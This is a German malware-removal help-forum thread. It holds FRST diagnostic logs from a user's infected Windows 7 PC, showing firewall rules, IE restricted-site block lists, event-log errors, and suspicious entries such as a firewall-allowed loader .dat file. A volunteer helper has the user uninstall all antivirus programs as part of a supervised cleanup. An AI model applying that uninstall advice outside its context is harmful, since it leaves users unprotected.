2013-11-06 16:52 - 2013-11-06 16:52 - 02258000 _____ () C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe
2012-01-25 05:00 - 2011-12-15 15:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-02-15 19:01 - 2016-01-12 06:43 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2015-06-22 19:41 - 2016-01-12 06:43 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2013-10-27 09:03 - 2016-02-09 10:39 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2013-11-06 12:59 - 2013-11-06 12:59 - 01633280 _____ () C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll
2014-02-23 14:33 - 2012-08-23 11:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2014-02-23 14:33 - 2013-05-16 11:55 - 00113496 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-02-23 14:33 - 2013-05-16 11:55 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2014-02-23 14:33 - 2013-05-16 11:55 - 00161112 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-02-23 14:33 - 2012-04-03 18:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2012-02-25 02:37 - 2011-12-16 03:39 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.

IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2017-05-05 18:51 - 00000853 _____ C:\Windows\system32\Drivers\etc\hosts


0.0.0.1	mssplus.mcafee.com

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.179.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{05211D32-AF63-4CB0-A6B7-B09C94D0B99B}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{71D985ED-FDF0-42DE-9FC4-7C21A11D9FA0}] => (Allow) LPort=2869
FirewallRules: [{E65EEBEE-05F0-4C72-A9EE-0AA508672421}] => (Allow) LPort=1900
FirewallRules: [{9AA5011A-0FCC-4D9D-8784-BD7401D7A24A}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{EE66A64E-5B37-4916-9CC4-D4FBBB548A42}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{3C0F122C-0742-46E8-AC7F-1C1E9EEBC53E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FE0D6C86-8FFE-4877-8D0D-B0F7F5B00E9B}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [UDP Query User{0BA32332-6631-4B2C-B5B3-F4555E347C79}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [TCP Query User{1D9F0CA1-AB5A-4249-8524-86D12D4C7170}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [UDP Query User{CFD99534-FA56-4434-8213-7F76D477B272}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [{480E6B07-798E-4A2D-81A6-F92F0CB9EE60}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{2A3583E9-7472-4D17-A5D4-47875FB42265}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{C41C6DD4-CFFF-4655-874D-5CE44166C462}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\FaxApplications.exe
FirewallRules: [{CE06C567-97E9-467D-80F3-09CC2E7B28DE}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\DigitalWizards.exe
FirewallRules: [{5F4AD41E-6132-4D82-86A4-473BA3D09A0D}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\Bin\HPNetworkCommunicator.exe
FirewallRules: [{2702B751-16F9-48CD-9E49-A21421E09842}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\EWSProxy.exe
FirewallRules: [{3EB39716-41BA-45F6-AE81-D61AA6F58713}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{67109041-ED86-4F91-8309-D8BD9F30FA0D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{7500E678-5CB9-4385-8912-54B1C9347BE5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{CEDAF5DD-17C1-4B9F-89B2-88A0383795AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{2E65A8BF-A7AF-4F73-8D0A-3E85DAFED6C9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{83D8589A-4A65-4922-BDEA-1DA480FB8729}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{E6FBF0C0-7479-404F-ABB6-8EDD2183B6BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{BED2074E-60D7-4BB9-B15E-E4FFED41D21D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A59E9212-F88E-4BFF-ABE9-AE66ECBF2286}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6CCE5B8D-1C91-4A2C-88ED-15572F05F895}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E675A3F9-E1A9-42E5-A350-CF44D1BC3BA8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64AF72C0-C954-42A9-AD2D-0D552A3F2C5D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{87A2FE0E-AB34-4C95-B10C-5D9081F3F38B}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{7CB36E57-5C15-40DA-B8BD-CA7ABFFAEE9C}] => (Allow) C:\Program Files (x86)\MIO\loader\intensoxxssdxsataxiii_aa000000000000003571.dat
FirewallRules: [{D2776C81-FAD8-4999-BFA5-7FDA506FBE9A}] => (Allow) C:\Program Files (x86)\MIO\loader\intensoxxssdxsataxiii_aa000000000000003571.dat
FirewallRules: [{E59CD4FF-E038-4054-A24D-14B9E22A1A3D}] => (Allow) C:\Program Files (x86)\Hotleaf\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot-S&D 2 Tray Icon
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Wiederherstellungspunkte =========================


==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft-Teredo-Tunneling-Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/18/2017 05:25:44 PM) (Source: Avira Secure Backup Crawler) (EventID: 1) (User: )
Description: An error has occurred (COM Error: 80042302 : c:\memopal\client\src\service\shadowcopy\ShadowCopyImpl.h : 353
).

Error: (05/18/2017 05:25:44 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x80040154, Klasse nicht registriert
.


Vorgang:
   VSS-Server wird instanziiert

Error: (05/18/2017 05:25:44 PM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{e579ab5f-1cc4-44b4-bed9-de0991ff0623}" und dem Namen "IVssCoordinatorEx2" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].


Vorgang:
   VSS-Server wird instanziiert

Error: (05/18/2017 04:26:48 AM) (Source: System Restore) (EventID: 8193) (User: )
Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Beschreibung = Geplanter Prüfpunkt; Fehler = 0x80070422).

Error: (05/17/2017 09:51:24 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Beschreibung = Geplanter Prüfpunkt; Fehler = 0x80070422).

Error: (05/17/2017 09:21:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/17/2017 09:14:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: wmplayer.exe, Version: 12.0.7601.23517, Zeitstempel: 0x57adf9ea
Name des fehlerhaften Moduls: BtWmpPlugIn.dll_unloaded, Version: 0.0.0.0, Zeitstempel: 0x4ecc5372
Ausnahmecode: 0xc0000005
Fehleroffset: 0x05cd31c0
ID des fehlerhaften Prozesses: 0x7c4
Startzeit der fehlerhaften Anwendung: 0x01d2cf41d9712d11
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Pfad des fehlerhaften Moduls: BtWmpPlugIn.dll
Berichtskennung: 1a9b07c3-3b35-11e7-bf9a-c01885aadbce

Error: (05/17/2017 07:04:45 PM) (Source: Avira Secure Backup Crawler) (EventID: 1) (User: )
Description: An error has occurred (COM Error: 80042302 : c:\memopal\client\src\service\shadowcopy\ShadowCopyImpl.h : 353
).

Error: (05/17/2017 07:04:45 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x80040154, Klasse nicht registriert
.


Vorgang:
   VSS-Server wird instanziiert

Error: (05/17/2017 07:04:45 PM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{e579ab5f-1cc4-44b4-bed9-de0991ff0623}" und dem Namen "IVssCoordinatorEx2" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].


Vorgang:
   VSS-Server wird instanziiert


Systemfehler:
=============
Error: (05/18/2017 05:17:33 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Avira Echtzeit-Scanner" wurde unerwartet beendet. Dies ist bereits 6 Mal passiert.

Error: (05/18/2017 05:17:33 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "Avira Email-Schutz" ist vom Dienst "Avira Echtzeit-Scanner" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: 
Der Vorgang wurde erfolgreich beendet.

Error: (05/18/2017 05:17:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Avira Echtzeit-Scanner" wurde unerwartet beendet. Dies ist bereits 5 Mal passiert.

Error: (05/18/2017 05:17:29 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "Avira Browser-Schutz" ist vom Dienst "Avira Echtzeit-Scanner" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: 
Der Vorgang wurde erfolgreich beendet.

Error: (05/18/2017 05:17:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Avira Echtzeit-Scanner" wurde unerwartet beendet. Dies ist bereits 4 Mal passiert.

Error: (05/18/2017 05:17:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Avira Echtzeit-Scanner" wurde unerwartet beendet. Dies ist bereits 3 Mal passiert.

Error: (05/18/2017 05:17:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Avira Echtzeit-Scanner" wurde unerwartet beendet. Dies ist bereits 2 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.

Error: (05/18/2017 05:17:12 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Avira Echtzeit-Scanner" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 0 Millisekunden durchgeführt: Neustart des Diensts.

Error: (05/17/2017 09:36:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "CWASRE" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 21600000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (05/17/2017 09:23:36 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Windows Office Locker" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.


CodeIntegrity:
===================================
  Date: 2017-05-18 17:24:37.961
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-18 17:18:08.668
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 21:21:27.343
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 21:20:44.221
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 20:58:00.321
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 20:46:34.754
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 18:43:25.202
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 17:46:47.262
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 14:47:31.219
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-17 14:41:41.205
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Prozentuale Nutzung des RAM: 48%
Installierter physikalischer RAM: 8087.41 MB
Verfügbarer physikalischer RAM: 4169.78 MB
Summe virtueller Speicher: 16473.01 MB
Verfügbarer virtueller Speicher: 11930.37 MB

==================== Laufwerke ================================

Drive c: (System) (Fixed) (Total:188.51 GB) (Free:102.08 GB) NTFS
Drive e: (Volume) (Fixed) (Total:681.96 GB) (Free:417.12 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 236 GB) (Disk ID: 3EEEC186)
Partition 1: (Active) - (Size=6.2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=229.8 GB) - (Type=05)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: 0E5EE332)
Partition 1: (Active) - (Size=2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=696.6 GB) - (Type=OF Extended)

==================== Ende von Addition.txt ============================

--- --- ---

burningice · 18.05.2017, 22:53

Mein Name ist Rafael und ich werde dir bei der Bereinigung helfen.

Damit ich dir optimal helfen kann, halte dich bitte an folgende Regeln:

Bitte lies meine Posts komplett durch bevor du sie abarbeitest
Wenn ein Problem auftauchen sollte oder dir etwas unklar ist, unterbreche deine Arbeit und beschreibe es so genau wie möglich.
Bitte kein Crossposting
Installiere oder Deinstalliere keine Software ohne Aufforderung
Bitte verwende nur die Tools, welche hier im Thread erwähnt werden und führe sie nur gemäß Anweisung aus
Bitte antworte innerhalb von 24h um eine sinnvolle Bereinigung zu ermöglichen
Poste die Logs immer in CODE-Tags (#-Button), zur Not die Logs einfach aufteilen
Wichtig: Nur weil dein Problem mit einem Schritt plötzlich behoben ist, bedeutet das nicht, dass dein PC auch sauber ist. Mache solange weiter, bis ich dir sage, dass dein PC "clean" ist
Wir machen unsere Arbeit freiwillig und ehrenamtlich neben unserer normalen Beschäftigung im Leben. Dennoch, wenn ich dir nicht binnen 36h antworte, sende mir bitte eine persönliche Nachricht!

Los geht's

Mehrere Anti-Virus-Programme

Code:

ATTFilter

Emsisoft
Avira

Mir ist aufgefallen, dass Du mehr als ein Anti-Virus-Programm mit Hintergrundwächter laufen hast. Das ist gefährlich, da sich die Programme in die Quere kommen können und dadurch Viren erst recht auf dem Rechner landen können. Außerdem bremst es auch das System aus.

Wir sind in einer Bereinigung, deshalb behindern uns Sicherheitsprogramme zusätzlich. Deinstalliere alle oben genannten Programme über die Systemsteuerung => Software.

Darüber hinaus deinstalliere bitte Spybot Search and Destroy.

Danach geht es weiter

Dein PC ist übrigens ziemlich stark infiziert.

MBJPaul · 19.05.2017, 16:04

Hallo Rafael,
vielen Dank schon mal für deine Hilfe. Toll das ihr das hier anbietet.

Ich habe Avira mittels Systemsteuerung und Software deinstallieren erfolgreich gelöscht.

Leider finde ich in der Liste Emsisoft nicht. Ich habe die Software erst in der letzten Woche installiert und eigentlich müsste das bei der Auflistung nach Datum ziemlich weit oben stehen, es ist aber nichts zu finden.

Gibt es andere Art die Software vollständig zu löschen?

burningice · 19.05.2017, 21:58

klar damit

http://tmp.emsisoft.com/fw/emsiclean.exe

Danach bitte neue FRST Logs erstellen.

Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

MBJPaul · 20.05.2017, 16:43

Hallo,
Emsisoft ist nun auch gelöscht.

Hier die beiden Dateien: FRST
FRST Logfile:

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Markus (Administrator) auf MARKUS-PC (20-05-2017 17:39:17)
Gestartet von C:\Users\Markus\Desktop
Geladene Profile: Markus (Verfügbare Profile: Markus)
Platform: Windows 7 Professional Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
() C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe
() C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe
(HP) C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(pdfforge GmbH) C:\Program Files (x86)\PDF Architect\HelperService.exe
